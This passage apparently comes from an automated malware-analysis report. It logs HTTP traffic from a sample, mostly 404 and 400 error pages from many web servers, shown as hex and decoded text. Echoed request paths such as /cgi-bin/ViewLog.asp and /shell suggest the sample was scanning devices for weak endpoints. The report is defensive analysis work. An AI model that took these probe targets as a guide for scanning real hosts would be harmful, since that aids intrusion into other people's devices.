43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 23 Oct 2022 15:57:05 GMTServer: ApacheLast-Modified: Sun, 29 Nov 2015 21:50:54 GMTETag: "3ce-525b4eb417d8b"Accept-Ranges: bytesContent-Length: 974X-Powered-By: PleskLinKeep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/htmlData Raw: 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 42 41 53 45 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 5f 64 6f 63 73 2f 22 3e 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 36 5d 3e 3c 2f 42 41 53 45 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 64 6f 63 75 6d 65 6e 74 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 50 3e 0a 3c 48 52 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 0a 3c 21 2d 2d 0a 20 20 20 2d 20 55 6e 66 6f 72 74 75 6e 61 74 65 6c 79 2c 20 4d 69 63 72 6f 73 6f 66 74 20 68 61 73 20 61 64 64 65 64 20 61 20 63 6c 65 76 65 72 20 6e 65 77 0a 20 20 20 2d 20 22 66 65 61 74 75 72 65 22 20 74 6f 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 2e 20 49 66 20 74 68 65 20 74 65 78 74 20 6f 66 0a 20 20 20 2d 20 61 6e 20 65 72 72 6f 72 27 73 20 6d 65 73 73 61 67 65 20 69 73 20 22 74 6f 6f 20 73 6d 61 6c 6c 22 2c 20 73 70 65 63 69 66 69 63 61 6c 6c 79 0a 20 20 20 2d 20 6c 65 73 73 20 74 68 61 6e 20 35 31 32 20 62 79 74 65 73 2c 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 72 65 74 75 72 6e 73 0a 20 20 20 2d 20 69 74 73 20 6f 77 6e 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 2e 20 59 6f 75 20 63 61 6e 20 74 75 72 6e 20 74 68 61 74 20 6f 66 66 2c 0a 20 20 20 2d 20 62 75 74 20 69 74 27 73 20 70 72 65 74 74 79 20 74 72 69 63 6b 79 20 74 6f 20 66 69 6e 64 20 73 77 69 74 63 68 20 63 61 6c 6c 65 64 0a 20 20 20 2d 20 22 73 6d 61 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 22 2e 20 54 68 61 74 20 6d 65 61 6e 73 2c 20 6f 66 20 63 6f 75 72 73 65 2c 0a 20 20 20 2d 20 74 68 61 74 20 73 68 6f 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 61 72 65 20 63 65 6e 73 6f 72 65 64 20 62 79 20 64 65 66 61 75 6c 74 2e 0a 20 20 20 2d 20 49 49 53 20 61 6c 77 61 79 73 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 74 68 61 74 20 61 72 65 20 6c 6f 6e 67 0a 20 20 20 2d 20 65 6e 6f 75 67 68 20 74 6f 20 6d 61 6b 65 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 68 61 70 70 79 2e 20 54 68 65 0a 20 20 20 2d 20 77 6f 72 6b 61 72 6f 75 6e 64 20 69 73 20 70 72 65 74 74 79 20 73 69 6d 70 6c 65 3a 20 70 61 64 20 74 68 65 20 65 72 72 6f 72 0a 20 20 20 2d 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 61 20 62 69 67 20 63 6f 6d 6d 65 6e 74 20 6c 69 6b 65 20 74 68 69 73 20 74 6f 20 70 75 73 68 20 69 74 0a 20 20 20 2d 20 6f 76 65 72 20 74 68 65 20 66 69 76 65 20 68 75 6e 64 72 65 64 20 61 6e 64 20 74 77 65 6c 76 65 20 62 79 74 65 73 20 6d 69 6e 69 6d 75 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 23 Oct 2022 15:57:07 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 271Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 33 20 4f 63 74 20 32 30 32 32 20 31 35 3a 35 37 3a 30 37 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 31 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 72 6f 2d 63 74 70 2d 34 2e 74 68 6f 72 65 62 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 127.0.0.1 Port 80</address></body></html>HTTP/1.1 400 Bad RequestDate: Sun, 23 Oct 2022 15:57:07 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 311Connection: closeContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML P
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Sun, 23 Oct 2022 15:57:07 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Jul 2022 09:36:42 GMTServer: Boa/0.94.14rc21Accept-Ranges: bytesConnection: closeContent-Type: text/html; charset=ISO-8859-1Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>404 Not Found</H1>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</BODY></HTML>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCONNECTION: closeCONTENT-LENGTH: 48CONTENT-TYPE: text/htmlData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><body><h1>404 Not Found</h1></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 23 Oct 2022 11:57:06 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 23 Oct 2022 15:57:07 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 23 Oct 2022 15:57:09 GMTServer: Apache/2.0.63 (Win32) PHP/5.2.3Content-Length: 287Keep-Alive: timeout=15, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 68 65 6c 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 30 2e 36 33 20 28 57 69 6e 33 32 29 20 50 48 50 2f 35 2e 32 2e 33 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /shell was not found on this server.</p><hr><address>Apache/2.0.63 (Win32) PHP/5.2.3 Server at 127.0.0.1 Port 80</address></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 23 Oct 2022 15:57:09 GMTServer: ApacheContent-Length: 196Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 33 20 4f 63 74 20 32 30 32 32 20 31 35 3a 35 37 3a 30 39 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 32 36 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>HTTP/1.1 400 Bad RequestDate: Sun, 23 Oct 2022 15:57:09 GMTServer: ApacheContent-Length: 226Connection: closeContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: ise GmbH HTTP-Server v2.0Accept-Ranges: bytesCache-Control: no-store, no-cacheContent-Type: text/htmlContent-Length: 20
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.2Date: Sun, 23 Oct 2022 15:40:27 GMTContent-Type: text/htmlContent-Length: 169Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.2</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 23 Oct 2022 15:57:10 GMTServer: ApacheAccept-Ranges: bytesCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Keep-Alive: timeout=5, max=100Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: text/htmlData Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 33 0d 0a 34 30 34 0d 0a 31 0d 0a 20 0d 0a 39 0d 0a 4e 6f 74 20 46 6f 75 6e 64 0d 0a 31 66 63 61 0d 0a 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20
